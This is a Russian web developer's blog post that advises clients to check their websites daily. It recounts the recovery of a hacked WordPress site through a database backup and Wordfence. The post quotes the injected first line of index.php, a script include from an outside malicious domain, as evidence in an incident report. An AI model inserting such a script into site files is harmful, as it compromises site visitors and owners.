Вы проверяли сегодня ваш сайт?

Всем, кому я создавала сайты, создаю сайты и буду создавать сайты!


Когда я отправляю ваш сайт в плавание, т.е. сдаю его вам полностью готовым, я сайт уже не контролирую. Вы, как владелец своего сайта становитесь его основным наблюдателем. Помимо получения заказов с сайта, есть самая главная и несложная вещь, которую нужно делать со своим сайтом каждый день! Просто ЗАХОДИТЬ и смотреть на свой сайт. Каждый день. Как работает, всё ли у него в порядке?!


На ваш сайт может произойти вирусная атака #hacked и, если вы каждый день проверяете свой сайт, то сразу увидете, что сайт не здоров. В таком случае сайт можно более-менее быстро и безболезненно излечить, а вредителей изгнать.
НО! если вы не заходите на ваш сайт неделями, а то и месяцами, то и не узнаете, что у вас там творится?! На хостинге (в кастрюльке, где варится ваш сайт) будет архивироваться сломанная версия вашего сайта и восстановить сайт через N-время из такого бэкапа уже не удасться.
Будьте, пожалуйста, внимательны!
С уважением к вам и к вашим сайтам.
Ps не относится в сайтам, с которыми заключена услуга техподдержки.

взлом сайта

Сегодня позвонил клиент, которому я делала сайт в 2018 году и сказал, что его сайт не работает.

Сайт работает на WordPress.  У сайта индивидуальный дизайн. Хостер сайта не самый распространённый. Услугу каждодневной техподдержки владелец сайта у меня не заказывал. Сотрудничаем от времени ко времени: в основном, чтобы добавить контент.

Когда я зашла на сайт — сайт был нулевой. Т.е. как будто распаковали коробку с темой Вордпресс и главной страницей является страница записей.

Страница долго грузилась и слева снизу браузер сообщал, что соединяется

На мой вопрос, когда сайт стал таким, владелец сайта ответил, что заходил на сайт 3 недели назад и сайт был нормальным. 3 недели, Карл!

Что было в файлах сайта:

  • В index.php корня WP первой строчкой был скрипт src='https://tom.verybeatifulantony.com/y.js
  • Появился файл с кракозябрами wp-craft-report.php

Попытка починить сайт:

  • Восстановить сайт из бэкапа хостинга. Увы безуспешно, т.к. хостинг хранит у себя архивы за 5-ти дневный период. Сайт был взломан ранее, чем 5 дней назад. Я пользуюсь другим хостингом с 30-ти дневными бэкапами для своей услуги "сайты под ключ". Хостинг этого сайта покупал сам владелец.
  • При восстановлении архива с хостинга произошел ход конём - сайт стал редиректить на сайты-помойки. Редиректы срабатывали ежесекундно с помойки на другую помойку. Конечной точки редиректа я так и не дождалась.
  • Зайти в админ-панель WordPress мне не удалось, т.к. моего аккаунта администратора там просто не было. О чем мне тут же сообщил WP.
  • В базе данных сайта я пробежалась по файлам и увидела, что admin сайта - другой e-mail. Меня - нет. И ничего нет! Девственная коробка темы.
  • БД пустая. Без работ, рубрик, статей, страниц и прочей огромной работы, проведённой над сайтом.
  • В недрах своих архивов нашла архив с БД этого сайта. Удачно оказалось, что я его делала в последнее наполнение сайта. Удалось удачно восстановить - сайт снова работает.
  • Спрятала админку, установила Wordfence Alert. "Будем наблюдать" - как говорит один радиоведущий.
  • ps тема сайта и плагины из репозитория WP